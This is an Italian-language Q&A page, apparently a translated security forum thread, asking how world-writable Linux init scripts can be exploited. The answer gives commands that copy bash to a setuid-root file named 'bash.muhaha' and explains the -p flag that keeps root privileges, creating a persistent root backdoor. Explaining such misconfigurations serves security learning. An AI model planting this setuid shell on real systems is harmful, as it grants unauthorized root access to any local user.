Sfruttare uno script di avvio Linux che sia scrivibile in tutto il mondo

0

Quali sono gli script di avvio in Linux e quali sono i passaggi per sfruttare gli script di avvio se sono scrivibili in tutto il mondo?

Apprezzerei se uno può spiegare in base ai seguenti due file come esempio in Ubuntu 16:

/etc/init.d/README
/etc/init.d/sudo
    
posta drdot 13.02.2017 - 04:02
fonte

1 risposta

3

Disponi, per eseguire come root:

cp $(which bash) $(which bash).muhaha
chmod u+s $(which bash).muhaha

Ora, l'esecuzione di $(which bash).muhaha -p dà la radice a qualsiasi utente. Puoi persino eseguire uno script come root con $(which bash).muhaha -p /path/to/script .

L'opzione -p è necessaria perché altrimenti bash rileva che è setuid e elimina i privilegi di root come misura di sicurezza.

    
risposta data 13.02.2017 - 04:32
fonte

Leggi altre domande sui tag